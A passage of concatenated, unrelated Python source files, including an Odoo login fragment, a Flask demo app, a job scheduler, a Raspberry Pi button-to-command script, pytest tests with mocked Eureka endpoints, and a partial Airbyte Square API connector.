if werkzeug.urls.url_parse(resp.location).path == '/web' and not request.env.user.has_group('base.group_user'):
resp.location = '/'
return resp
except Exception as e:
params_data['error'] = "登录时发生错误:{}".format(str(e))
return request.render('web.login', params_data)
|
#!/usr/bin/env python
#
# ======================================================================
#
# Brad T. Aagaard, U.S. Geological Survey
#
# This code was developed as part of the Computational Infrastructure
# for Geodynamics (http://geodynamics.org).
#
# Copyright (c) 2010-2017 University of California, Davis
#
# See COPYING for license information.
#
# ======================================================================
#
import unittest
class TestCSGeo(unittest.TestCase):
def test_initialize(self):
from spatialdata.geocoords.CSGeo import CSGeo
cs = CSGeo()
cs.inventory.ellipsoid = "clrk66"
cs.inventory.datumHoriz = "NAD27"
cs.inventory.datumVert = "mean sea level"
cs.inventory.units = "km"
cs.inventory.spaceDim = 2
cs._configure()
cs.initialize()
self.assertEqual("clrk66", cs.ellipsoid())
self.assertEqual("NAD27", cs.datumHoriz())
self.assertEqual("mean sea level", cs.datumVert())
self.assertEqual(False, cs.isGeocentric())
self.assertEqual(1.0e+3, cs.toMeters())
self.assertEqual(2, cs.spaceDim())
return
# End of file
|
from flask import Flask, redirect, url_for, render_template, request, session, send_file
app = Flask(__name__)
@app.route("/")
def home():
return render_template("index.html")
@app.route("/login", methods=["POST", "GET"])
def login():
if request.method == "POST":
user = request.form["nm"]
session["user"] = user
return redirect(url_for("user", usr=user))
else:
return render_template("login.html")
@app.route("/file", methods=["GET"])
def generate_pdf():
return render_template("pdf.html")
@app.route("/file_download")
def file_download():
return send_file('/Users/rob/Documents/GitHub/BloodAnalysis/Models/test.txt')
@app.route("/<usr>")
def user(usr):
return f"<h1>{usr}</h1>"
@app.route("/params")
def params():
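# Example request for this route (illustrative): GET /params?arg1=foo&arg2=bar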
arg1 = request.args['arg1']
arg2 = request.args['arg2']
return ""
if __name__ == "__main__":
app.run()
|
import json
import jsonlines
import spacy
from spacy.kb import KnowledgeBase
def save_500():
# Prepare datafiles
json_loc = "../../data/prodigy_data/annotations_input.jsonl"
new_loc = "../../data/prodigy_data/iaa_input.jsonl"
# Prepare resources
nlp = spacy.load('../resources/nen_nlp')
kb = KnowledgeBase(vocab=nlp.vocab, entity_vector_length=96)
kb.load_bulk('../resources/kb_initial')
i = 0
j = 0
unique_orgs = []
limit = 400
# Open file to save IAA-annotations in
outfile = jsonlines.open(new_loc, 'w')
# Go through all annotations
with open(json_loc, 'r', encoding='utf8') as jsonfile:
for line in jsonfile:
example = json.loads(line)
org = example['org']
if len(kb.get_candidates(org)) > 1:
i += 1
if i > 4070 and org not in unique_orgs and j < limit:
j += 1
outfile.write(example)
unique_orgs.append(org)
print(j, ", sample: ", i)
outfile.close()
print(f"{limit} IAA-annotations Prodigy input saved in ../prodigy/iaa_input.jsonl")
def main():
save_500()
if __name__ == '__main__':
main()
|
from datetime import datetime
from threading import Timer
from . import now
from . import start_web_interface
port = 8765
class Scheduler(object):
"""
Manages Job objects and the waiting between job executions
"""
def __init__(self, log=None):
self.jobs = []
self.current_job = None
self.sleeper = None
self.running = False
if log:
self.log = log
else:
import logging
self.log = logging.getLogger('pyriodic_dummy')
self.log.info('Initializing Scheduler')
def _set_timer(self):
"""
Finds the next job and, if it is not already the current job, sets it as the current job
and starts a Timer that fires at that job's next scheduled run time.
"""
if self.jobs:
next_job = self.jobs[0]
if not next_job.is_paused() and self.current_job != next_job:
if self.sleeper:
self.sleeper.cancel()
wait_time = (next_job.next_run_time - now()).total_seconds()
self.sleeper = Timer(wait_time, self._execute_job)
self.sleeper.start()
self.current_job = next_job
self.running = True
def _execute_job(self):
"""
Runs the currently scheduled job in its own thread if it is marked as threaded, otherwise
executes it inline. Afterwards it trims, sorts and sets up the next job for execution.
"""
if self.current_job:
if not self.current_job.is_paused():
if self.current_job.threaded:
self.current_job.thread = self.current_job.run(self.current_job.retrys)
else:
self.current_job.run(self.current_job.retrys)
self.current_job = None
if self.running:
self._trim_jobs()
self._sort_jobs()
self._set_timer()
def _sort_jobs(self):
"""
Sorts the jobs by time remaining until their next execution, soonest first; jobs without
a next_run_time are placed last.
"""
if len(self.jobs) > 1:
self.jobs.sort(key=lambda job: job.next_run_time if job.next_run_time is not None else datetime.max)
def _trim_jobs(self):
"""
Removes any jobs that are not set to repeat and have already executed at least once from the list of jobs
"""
for job in self.jobs:
if not job.repeating and job.run_count > 0:
self.remove(job.name)
def add_job(self, job):
"""
Takes a Job object and adds it to the list of jobs, gives it a name if it doesn't have one, sorts the jobs and
then sets up the next job for execution. Returns the job name so the job can be referenced later.
"""
if job.name is None:
job.name = 'Job{}'.format(len(self.jobs) + 1)
job.parent = self
self.jobs.append(job)
self._sort_jobs()
self._set_timer()
return job.name
def schedule_job(self, job_type, when, args=None, kwargs=None, name=None, repeating=True, threaded=True,
ignore_exceptions=False, retrys=0, retry_time=0, alt_func=None, start_time=None, interval=None,
custom_format=None):
"""
A decorator factory that registers the decorated function as a new job of the given type
"""
def inner(func):
self.add_job(job_type(func=func, when=when, args=args, kwargs=kwargs, name=name, repeating=repeating,
threaded=threaded, ignore_exceptions=ignore_exceptions, retrys=retrys, retry_time=retry_time,
alt_func=alt_func, start_time=start_time, interval=interval, custom_format=custom_format))
return func
return inner
def get_job(self, name):
"""
Finds and returns the Job object that matched the name provided
"""
return self.jobs[self.find_job_index(name)]
def reset(self):
"""
Resets the Scheduler status by clearing the current job,
stopping the Timer, sorting the jobs and setting the next Timer
"""
self.running = True
self.current_job = None
if self.sleeper:
self.sleeper.cancel()
self.sleeper = None
self._sort_jobs()
self._set_timer()
def remove(self, name):
"""
Finds and removes the Job object that matched the name provided
"""
idx = self.find_job_index(name)
job = self.jobs[idx]
del self.jobs[idx]
if self.current_job == job:
self.reset()
def pop(self, name):
"""
Finds and removes the Job object that matched the name provided and returns it
"""
idx = self.find_job_index(name)
if self.current_job == self.jobs[idx]:
self.reset()
return self.jobs.pop(idx)
def job_names(self):
"""
Returns a list of the names for the jobs in the scheduler
"""
return [job.name for job in self.jobs]
def find_job_index(self, name):
"""
Finds the index of the job that matches the name provided from the list of Job objects
"""
for x, job in enumerate(self.jobs):
if job.name == name:
return x
def next_run_times(self):
"""
Returns a dictionary mapping each job's name to its next run time
"""
return {job.name: job.next_run_time for job in self.jobs}
def start_all(self):
"""
Starts any jobs that are not currently running (e.g. paused jobs), then resets the scheduler
"""
for job in self.jobs:
if not job.is_running():
job.start()
self.reset()
def stop_scheduler(self):
"""
Stops the scheduler from executing any jobs
"""
self.running = False
self.current_job = None
if self.sleeper:
self.sleeper.cancel()
self.sleeper = None
def pause_all(self, cancel_current=False):
"""
Pauses all the jobs currently in the scheduler with the option
to cancel the Timer for the currently scheduled job
"""
for job in reversed(self.jobs):
job.pause()
if cancel_current:
self.reset()
def start_web_server(self, pre_existing_server=False, p=port):
"""
Starts a CherryPy web application for viewing and managing scheduled jobs.
Requires that CherryPy is installed on the system
"""
global port
try:
# noinspection PyUnresolvedReferences
import cherrypy
start_web_interface(self)
if not pre_existing_server:
cherrypy.config.update({'server.socket_port': p})
cherrypy.engine.start()
print('Started the Pyriodic web interface at http://localhost:{}/pyriodic'.format(p))
port += 1 # increments so multiple schedulers can be instantiated and display their own jobs page
except ImportError:
raise ImportError('The web interface requires that CherryPy be installed')
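# Usage sketch (illustrative only -- DurationJob is a hypothetical Job subclass; substitute
# whichever Job type this package actually provides):
#
#   from pyriodic import Scheduler, DurationJob
#
#   sched = Scheduler()
#
#   @sched.schedule_job(DurationJob, '10s', repeating=True)
#   def heartbeat():
#       print('still alive')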
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
## Copyright 2018 KYOHRITSU ELECTRONIC INDUSTRY CO., LTD.
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to
## deal in the Software without restriction, including without limitation the
## rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
## sell copies of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in
## all copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
## FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
## IN THE SOFTWARE.
import sys
import signal
from subprocess import Popen, call
from time import sleep
from rscsp.onboard import onboard
# Command to run when the button is released (off-edge detection)
COMMAND_ON_RELEASE = ('. env/bin/activate && '
'googlesamples-assistant-hotword --device_model_id my_rpi1')
PRECOMMAND_ON_RELEASE = 'pkill -f "googlesamples-assistant-hotword"'
# Command to run when a long press is detected
COMMAND_ON_HOLD = 'sudo shutdown -h now'
# Long-press recognition time (seconds)
SW_HOLD_THRESHOLD_SECONDS = 5.0
def signal_handler(signum, frame):
"""各シグナル受信によるプログラムの終了処理"""
print('Quit on SIGNAL %d...' % signum, file=sys.stderr)
onboard.clean()
sys.exit(0)
if __name__ == '__main__':
# Register the handler to run when SIGTERM is received
signal.signal(signal.SIGTERM, signal_handler)
# Start using the status LED and turn it on
onboard.status.use(1)
# Start using the push-button switch
onboard.pushsw.use()
# Run the corresponding command on release (off-edge) or long-press detection
try:
while True:
# Read the switch input
onboard.pushsw.capture()
# Check for a release (off-edge) event
if onboard.pushsw.off_edge():
call(PRECOMMAND_ON_RELEASE, shell=True)
Popen(COMMAND_ON_RELEASE, shell=True)
# Check for a long press
if onboard.pushsw.hold_time() >= SW_HOLD_THRESHOLD_SECONDS:
Popen(COMMAND_ON_HOLD, shell=True)
break
# Wait a short, fixed interval before polling again
sleep(0.02)
# Break out of the loop on Ctrl+C
except KeyboardInterrupt:
print('Quit...')
# Clean up and exit
onboard.clean()
sys.exit(0)
|
# -*- coding: utf-8 -*
import urllib
import re
import os
import json
from imdbpie import Imdb
from datetime import datetime
class Movie():
"""Movie object storing detailed information and related media links
Parameters
----------
title
Movie title
storyline
A short excerpt of the movie's storyline
poster_image_url
Covershot URL
trailer_youtube_url
Youtube URL of the trailer
genre : list
List of genres
"""
__api_key = ""
__movies = []
def __init__(self, title, storyline, image, trailer_url, genre, released):
self.title = title
self.storyline = storyline
self.poster_image_url = image
self.trailer_youtube_url = trailer_url
self.genre = genre
self.released = released
self.release_year = datetime.strptime(released, '%Y-%m-%d').year
@staticmethod
def set_api_key(api_key):
"""Sets the private property __api_key to allow information retrieval from the selected inofficial IMDb REST API"""
Movie.__api_key = api_key
@staticmethod
def validate_imdb(fragment):
"""Validates the passed parameter against the typical IMDb ID pattern"""
return re.match('tt[0-9]{7}$',fragment)
@staticmethod
def validate_youtube(fragment):
"""Validates the passed parameter against by retrieving the HTTP response code assuming 200 means it is valid.
@return bool
"""
request=urllib.urlopen('https://www.youtube.com/watch?v=' + fragment)
return request.getcode() == 200
@staticmethod
def imdb_load_file(file_name):
"""Loads a stored JSON file according for the given filename from the subfolder imdb."""
imdb_saved = open(file_name)
imdb_save = json.loads(imdb_saved.read())
Movie.__movies.append(
Movie(
imdb_save['title'],
imdb_save['description'],
imdb_save['image'],
"https://www.youtube.com/watch?v=" + imdb_save['youtube_id'],
imdb_save['genres'],
imdb_save['released']
)
)
@staticmethod
def imdb_load():
"""Loads all JSON files from the subfolder imdb and calls imdb_load_file respectively.
@return list
"""
for root, dirs, filenames in os.walk(os.path.dirname(__file__) + "/imdb"):
for file_name in filenames:
if file_name.find(".json") > 0:
Movie.imdb_load_file(os.path.dirname(__file__) + "/imdb/" + file_name)
return Movie.__movies
@staticmethod
def add_from_imdb(imdb_id, youtube_id):
"""Retrieves movie data from the inofficial IMDb REST API as well as the IMDB lib imdbpie."""
file_name = os.path.dirname(__file__) + "/imdb/" + imdb_id + ".json"
if not os.path.isdir(os.path.dirname(file_name)):
os.mkdir(os.path.dirname(file_name))
if os.path.isfile(file_name):
imdb_saved = open(file_name)
imdb_save = json.loads(imdb_saved.read())
else:
response = urllib.urlopen('http://imdb.wemakesites.net/api/' + imdb_id + '?api_key=' + Movie.__api_key)
json_response = response.read()
imdb_data = json.loads(json_response)
imdb_save = imdb_data['data']
imdb = Imdb(anonymize=True)  # to proxy requests
movie = imdb.get_title_by_id(imdb_id)
if not movie.title:
movie.title = raw_input("Movie Title not defined. Please set: ")
imdb_save['rating'] = movie.rating
imdb_save['title'] = movie.title
if youtube_id:
imdb_save['youtube_id'] = youtube_id
imdb_file = open(file_name, 'w')
imdb_file.write(json.dumps(imdb_save))
imdb_file.close()
|
#!/usr/bin/env python3
from housepy import config, log, util, strings
from mongo import db
def main():
log.info("core_tagger...")
t = util.timestamp()
features = db.features.find({'properties.Expedition': config['expedition'], 'properties.CoreExpedition': {'$exists': False}})
for feature in features:
if t - feature['properties']['t_utc'] > 60 * 60 * 48: ## after 48 hours, don't worry about it
continue
log.info("Updating feature %s" % feature['_id'])
if 'Member' not in feature['properties']:
log.warning("--> no member, feature_type is %s" % feature['properties']['FeatureType'])
continue
member = feature['properties']['Member']
if member is None:
core_sat = config['satellites'][0]
if 'Satellite' in feature['properties']:
core = feature['properties']['Satellite'] == core_sat
log.info("--> satellite, core is %s" % core)
else:
log.info("--> null Member, core is True")
core = True
else:
t = feature['properties']['t_utc']
try:
core = list(db.members.find({'Name': member, 't_utc': {'$lte': t}}).sort('t_utc', -1).limit(1))[0]['Core']
log.info("--> core is %s" % core)
except Exception as e:
log.info("--> no core entry at time %s" % t)
continue
db.features.update({'_id': feature['_id']}, {'$set': {'properties.CoreExpedition': core}})
log.info("--> updated feature, CoreExpedition: %s" % core)
main()
|
from typing import List
from morpho.error import NoWorkerFunctionError
from morpho.rest.models import TransformDocumentRequest
import httpretty
from pydantic.main import BaseModel
import pytest
from morpho.config import ServiceConfig
from morpho.consumer import RestGatewayConsumer, RestGatewayServiceConfig, WorkConsumer
from morpho.types import Worker
from tests.unit.eureka_mock_data import (
EUREKA_GET_APPS_RESPONSE_CAESER_PERMUTATION_VIGENERE,
EUREKA_GET_APPS_RESPONSE_ONLY_CAESER,
EUREKA_GET_APPS_RESPONSE_CAESER_PERMUATION_CRYPTOxGW,
EUREKA_GET_APPS_RESPONSE_ECHO_COUNT_CRYPTOxGW,
)
class MockConsumer(WorkConsumer):
def start(self) -> None:
pass
@pytest.fixture
def consumer():
yield MockConsumer(work=None, config=ServiceConfig(name="ECHO"), options_type=None)
@pytest.fixture
def consumer_eureka():
yield MockConsumer(
work=None, config=ServiceConfig(name="CAESER", register=True), options_type=None
)
def test_list_services_no_eureka(consumer: MockConsumer):
list_service_response = consumer.list_services()
assert len(list_service_response.services) == 1
assert list_service_response.services[0].name == "ECHO"
@httpretty.activate(allow_net_connect=False)
def test_list_services_with_eureka_and_three_apps(consumer_eureka: MockConsumer):
httpretty.register_uri(
httpretty.GET,
"http://localhost:8761/eureka/apps/",
body=EUREKA_GET_APPS_RESPONSE_CAESER_PERMUTATION_VIGENERE,
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50000/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50001/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50002/v1/service/options",
body="{}",
status=200,
)
list_services_response = consumer_eureka.list_services()
# FIXME: maybe bad because what if the order changes?
# the test should not care in which order they are received
assert len(list_services_response.services) == 3
assert list_services_response.services[0].name == "CAESER"
assert list_services_response.services[0].options == {}
assert list_services_response.services[1].name == "PERMUTATION"
assert list_services_response.services[1].options == {}
assert list_services_response.services[2].name == "VIGENERE"
assert list_services_response.services[2].options == {}
@httpretty.activate(allow_net_connect=False)
def test_list_services_with_eureka_and_no_other_apps(consumer_eureka: MockConsumer):
httpretty.register_uri(
httpretty.GET,
"http://localhost:8761/eureka/apps/",
body=EUREKA_GET_APPS_RESPONSE_ONLY_CAESER,
status=200,
)
list_services_response = consumer_eureka.list_services()
assert len(list_services_response.services) == 1
assert list_services_response.services[0].name == "CAESER"
assert list_services_response.services[0].options == {}
@httpretty.activate(allow_net_connect=False)
def test_list_services_with_eureka_and_two_other_apps_and_one_gateway(
consumer_eureka: MockConsumer,
):
httpretty.register_uri(
httpretty.GET,
"http://localhost:8761/eureka/apps/",
body=EUREKA_GET_APPS_RESPONSE_CAESER_PERMUATION_CRYPTOxGW,
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50000/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50001/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50002/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50002/v1/service/list",
body="""{"services": [
{"name": "CAESER", "options": {}},
{"name": "PERMUTATION", "options": {}},
{"name": "CRYPTO.GW", "options": {}},
{"name": "CRYPTO.CRYPTOSIE", "options": {}}
]}""",
status=200,
)
list_services_response = consumer_eureka.list_services()
assert len(list_services_response.services) == 4
assert list_services_response.services[0].name == "CAESER"
assert list_services_response.services[0].options == {}
assert list_services_response.services[1].name == "PERMUTATION"
assert list_services_response.services[1].options == {}
assert list_services_response.services[2].name == "CRYPTO.GW"
assert list_services_response.services[2].options == {}
assert list_services_response.services[3].name == "CRYPTO.CRYPTOSIE"
assert list_services_response.services[3].options == {}
@httpretty.activate(allow_net_connect=False)
def test_list_services_with_eureka_and_two_other_apps_and_one_gateway_resolver():
httpretty.register_uri(
httpretty.GET,
"http://localhost:8761/eureka/apps/",
body=EUREKA_GET_APPS_RESPONSE_ECHO_COUNT_CRYPTOxGW,
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:8762/eureka/apps/",
body=EUREKA_GET_APPS_RESPONSE_CAESER_PERMUTATION_VIGENERE,
status=200,
)
# CAESER PERMUTATION VIGENERE
httpretty.register_uri(
httpretty.GET,
"http://localhost:50000/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50001/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50002/v1/service/options",
body="{}",
status=200,
)
# ECHO COUNT
httpretty.register_uri(
httpretty.GET,
"http://localhost:50010/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50011/v1/service/options",
body="{}",
status=200,
)
mock_rest_gateway_consumer = RestGatewayConsumer(
work=None,
config=RestGatewayServiceConfig(
name="CRYPTO.GW",
register=True,
registrar_url="http://localhost:8761/eureka",
resolver_url="http://localhost:8762/eureka",
),
options_type=None,
)
list_service_response = mock_rest_gateway_consumer.list_services()
assert len(list_service_response.services) == 6
assert list_service_response.services[0].name == "CRYPTO.GW"
assert list_service_response.services[0].options == {}
assert list_service_response.services[1].name == "ECHO"
assert list_service_response.services[1].options == {}
assert list_service_response.services[2].name == "COUNT"
assert list_service_response.services[2].options == {}
assert list_service_response.services[3].name == "CRYPTO.CAESER"
assert list_service_response.services[3].options == {}
assert list_service_response.services[4].name == "CRYPTO.PERMUTATION"
assert list_service_response.services[4].options == {}
assert list_service_response.services[5].name == "CRYPTO.VIGENERE"
assert list_service_response.services[5].options == {}
def test_options_no_options(consumer: MockConsumer):
result = consumer.options()
assert result == {}
def test_options_with_options():
class Options(BaseModel):
offset: int = 0
consumer = MockConsumer(
work=None,
config=ServiceConfig(name="CAESER", options=Options),
options_type=Options,
)
result = consumer.options()
assert result == {
"title": "Options",
"type": "object",
"properties": {"offset": {"title": "Offset", "default": 0, "type": "integer"}},
}
def test_transform_document_no_worker(consumer: MockConsumer):
request = TransformDocumentRequest(document="Hello World!", service_name="CAESER")
with pytest.raises(NoWorkerFunctionError, match="No worker function specified!"):
consumer.transform_document(request=request)
def mock_echo_worker(document: str):
return document
def mock_append_worker(document: str):
return "Appended" + document
def mock_echo_print_output_worker(document: str):
print("transforming...")
return document
@pytest.mark.parametrize(
"worker_function,document,expected_document,expected_output",
[
(mock_echo_worker, "Document!", "Document!", []),
(mock_append_worker, "Document", "AppendedDocument", []),
(mock_echo_print_output_worker, "Doc", "Doc", ["transforming..."]),
],
)
def test_transform_document_with_worker(
worker_function: Worker,
document: str,
expected_document: str,
expected_output: List[str],
):
consumer = MockConsumer(
work=worker_function, config=ServiceConfig(name="ECHO"), options_type=None
)
request = TransformDocumentRequest(document=document, service_name="ECHO")
result = consumer.transform_document(request=request)
assert result.document == expected_document
assert result.output == expected_output
assert result.error == []
|
import time
from functools import wraps
from nose.tools import nottest
from selfdrive.hardware import PC
from selfdrive.version import training_version, terms_version
from selfdrive.manager.process_config import managed_processes
def set_params_enabled():
from common.params import Params
params = Params()
params.put("HasAcceptedTerms", terms_version)
params.put("CompletedTrainingVersion", training_version)
params.put_bool("OpenpilotEnabledToggle", True)
params.put_bool("CommunityFeaturesToggle", True)
params.put_bool("Passive", False)
def phone_only(x):
if PC:
return nottest(x)
else:
return x
def with_processes(processes, init_time=0, ignore_stopped=None):
ignore_stopped = [] if ignore_stopped is None else ignore_stopped
def wrapper(func):
@wraps(func)
def wrap(*args, **kwargs):
# start and assert started
for n, p in enumerate(processes):
managed_processes[p].start()
if n < len(processes) - 1:
time.sleep(init_time)
assert all(managed_processes[name].proc.exitcode is None for name in processes)
# call the function
try:
func(*args, **kwargs)
# assert processes are still started
assert all(managed_processes[name].proc.exitcode is None for name in processes if name not in ignore_stopped)
finally:
for p in processes:
managed_processes[p].stop()
return wrap
return wrapper
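# Usage sketch (illustrative only -- the process names below are placeholders; use names
# that actually exist in managed_processes):
#
#   @phone_only
#   @with_processes(['camerad', 'sensord'], init_time=1)
#   def test_sensors_alive():
#       time.sleep(5.0)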
|
#
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
import json
from abc import ABC, abstractmethod
from typing import Any, Iterable, List, Mapping, MutableMapping, Optional, Tuple
import pendulum
import requests
from airbyte_cdk.models import SyncMode
from airbyte_cdk.sources import AbstractSource
from airbyte_cdk.sources.streams import Stream
from airbyte_cdk.sources.streams.http import HttpStream
from airbyte_cdk.sources.streams.http.auth import TokenAuthenticator
from source_square.utils import separate_items_by_count
class SquareException(Exception):
""" Just for formatting the exception as Square"""
def __init__(self, status_code, errors):
self.status_code = status_code
self.errors = errors
def __str__(self):
return f"Code: {self.status_code}, Detail: {self.errors}"
def parse_square_error_response(error: requests.exceptions.HTTPError) -> SquareException:
if error.response.content:
content = json.loads(error.response.content.decode())
if content and "errors" in content:
return SquareException(error.response.status_code, content["errors"])
class SquareStream(HttpStream, ABC):
def __init__(self, is_sandbox: bool, api_version: str, start_date: str, include_deleted_objects: bool, **kwargs):
super().__init__(**kwargs)
self.is_sandbox = is_sandbox
self.api_version = api_version
# Convert the user's ISO 8601 date (YYYY-MM-DD) to RFC 3339 (e.g. 2021-06-14T13:47:56.799Z),
# since that is the standard Square uses in records' 'updated_at' field
self.start_date = pendulum.parse(start_date).to_rfc3339_string()
self.include_deleted_objects = include_deleted_objects
data_field = None
primary_key = "id"
items_per_page_limit = 100
@property
def url_base(self) -> str:
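# e.g. "https://connect.squareupsandbox.com/v2/" when is_sandbox is True,
# otherwise "https://connect.squareup.com/v2/"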
return "https://connect.squareup{}.com/v2/".format("sandbox" if self.is_sandbox else "")
def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:
next_page_cursor = response.json().get("cursor", False)
if next_page_cursor:
return {"cursor": next_page_cursor}
def request_headers(
self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, Any] = None, next_page_token: Mapping[str, Any] = None
) -> Mapping[str, Any]:
return {"Square-Version": self.api_version, "Content-Type": "application/json"}
def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:
json_response = response.json()
records = json_response.get(self.data_field, []) if self.data_field is not None else json_response
yield from records
def _send_request(self, request: requests.PreparedRequest, request_kwargs: Mapping[str, Any]) -> requests.Response:
try:
return super()._send_request(request, request_kwargs)
except requests.exceptions.HTTPError as e:
square_exception = parse_square_error_response(e)
if square_exception:
self.logger.error(str(square_exception))
raise e
# Some streams expect next_page_token in the request query parameters (TeamMemberWages, Customers),
# while others expect it in the JSON payload (Items, Discounts, Orders, etc).
# That is why the two classes SquareStreamPageParam and SquareStreamPageJson exist.
class SquareStreamPageParam(SquareStream, ABC):
def request_params(
self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, Any] = None, next_page_token: Mapping[str, Any] = None
) -> MutableMapping[str, Any]:
return {"cursor": next_page_token["cursor"]} if next_page_token else {}
class SquareStreamPageJson(SquareStream, ABC):
def request_body_json(
self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, Any] = None, next_page_token: Mapping[str, Any] = None
) -> Optional[Mapping]:
return {"cursor": next_page_token["cursor"]} if next_page_token else {}
class SquareStreamPageJsonAndLimit(SquareStreamPageJson, ABC):
def request_body_json(
self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, Any] = None, next_page_token: Mapping[str, Any] = None
) -> Optional[Mapping]:
json_payload = {"limit": self.items_per_page_limit}
if next_page_token:
json_payload.update(next_page_token)
return json_payload
class SquareCatalogObjectsStream(SquareStreamPageJson):
data_field = "objects"
http_method = "POST"
items_per_page_limit = 1000
def path(self, **kwargs) -> str:
return "catalog/search"
def request_body_json(
self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, Any] = None, next_page_token: Mapping[str, Any] = None
) -> Optional[Mapping]:
json_payload = super().request_body_json(stream_state, stream_slice, next_page_token)
if self.path() == "catalog/search":
json_payload["include_deleted_objects"] = self.include_deleted_objects
json_payload["include_related_objects"] = False
json_payload["limit"] = self.items_per_page_limit
return json_payload
class IncrementalSquareGenericStream(SquareStream, ABC):
def get_updated_state(self, current_stream_state: MutableMapping[str, Any], latest_record: Mapping[str, Any]) -> Mapping[str, Any]:
if current_stream_state is not None and self.cursor_field in current_stream_state:
return {self.cursor_field: max(current_stream_state[self.cursor_field], latest_record[self.cursor_field])}
else:
return {self.cursor_field: self.start_date}
class IncrementalSquareCatalogObjectsStream(SquareCatalogObjectsStream, IncrementalSquareGenericStream, ABC):
@property
@abstractmethod
def object_type(self):
"""Object type property"""
state_checkpoint_interval = SquareCatalogObjectsStream.items_per_page_limit
cursor_field = "updated_at"
def request_body_json(self, stream_state: Mapping[str, Any], **kwargs) -> Optional[Mapping]:
json_payload = super().request_body_json(stream_state, **kwargs)
if stream_state:
json_payload["begin_time"] = stream_state[self.cursor_field]
json_payload["object_types"] = [self.object_type]
return json_payload
class IncrementalSquareStream(IncrementalSquareGenericStream, SquareStreamPageParam, ABC):
state_checkpoint_interval = SquareStream.items_per_page_limit
cursor_field = "created_at"
def request_params(
self,
stream_state: Mapping[str, Any],
stream_slice: Mapping[str, Any] = None,
next_page_token: Mapping[str, Any] = None,
) -> MutableMapping[str, Any]:
params_payload = super().request_params(stream_state, stream_slice, next_page_token)
if stream_state:
params_payload["begin_time"] = stream_state[self.cursor_field]
params_payload["limit"] = self.items_per_page_limit
return params_payload
class Items(IncrementalSquareCatalogObjectsStream):
"""Docs: https://developer.squareup.com/explorer/square/catalog-api/search-catalog-objects
with object_types = ITEM"""
object_type = "ITEM"
class Categories(IncrementalSquareCatalogObjectsStream):
"""Docs: https://developer.squareup.com/explorer/square/catalog-api/search-catalog-objects
with object_types = CATEGORY"""
object_type = "CATEGORY"
class Discounts(IncrementalSquareCatalogObjectsStream):
"""Docs: https://developer.squareup.com/explorer/square/catalog-api/search-catalog-objects
with object_types = DISCOUNT"""
object_type = "DISCOUNT"
class Taxes(IncrementalSquareCatalogObjectsStream):
"""Docs: https://developer.squareup.com/explorer/square/catalog-api/search-catalog-objects
with object_types = TAX"""
object_type = "TAX"
class ModifierList(IncrementalSquareCatalogObjectsStream):
"""Docs: https://developer.squareup.com/explorer/square/catalog-api/search-catalog-objects
with object_types = MODIFIER_LIST"""
object_type = "MODIFIER_LIST"
class Refunds(IncrementalSquareStream):
""" Docs: https://developer.squareup.com/reference/square_2021-06-16/refunds-api/list-payment-refunds """
data_field = "refunds"
def path(self, **kwargs) -> str:
return "refunds"
def request_params(self, **kwargs) -> MutableMapping[str, Any]:
params_payload = super().request_params(**kwargs)
params_payload["sort_order"] = "ASC"
return params_payload
class Payments(IncrementalSquareStream):
""" Docs: https://developer.squareup.com/reference/square_2021-06-16/payments-api/list-payments """
data_field = "payments"
def path(self, **kwargs) -> str:
return "payments"
def request_params(self, **kwargs) -> MutableMapping[str, Any]:
params_payload = super().request_params(**kwargs)
params_payload["sort_order"] = "ASC"
return params_payload
class Locations(SquareStream):
""" Docs: https://developer.squareup.com/explorer/square/locations-api/list-locations """
data_field = "locations"
def path(self, **kwargs) -> str:
return "locations"
class Shifts(SquareStreamPageJsonAndLimit):
""" Docs: https://developer.squareup.com/reference/square/labor-api/search-shifts """
data_field = "shifts"
http_method = "POST"
items_per_page_limit = 200
def path(self, **kwargs) -> str:
return "labor/shifts/search"
class TeamMembers(SquareStreamPageJsonAndLimit):
""" Docs: https://developer.squareup.com/reference/square/team-api/search-team-members """
data_field = "team_members"
http_method = "POST"
def path(self, **kwargs) -> str:
return "team-members/search"
class TeamMemberWages(SquareStreamPageParam):
""" Docs: https://developer.squareup.com/reference/square_2021-06-16/labor-api/list-team-member-wages """
data_field = "team_member_wages"
items_per_page_limit = 200
def path(self, **kwargs) -> str:
return "labor/team-member-wages"
def request_params(self, **kwargs) -> MutableMapping[str, Any]:
params_payload = super().request_params(**kwargs)
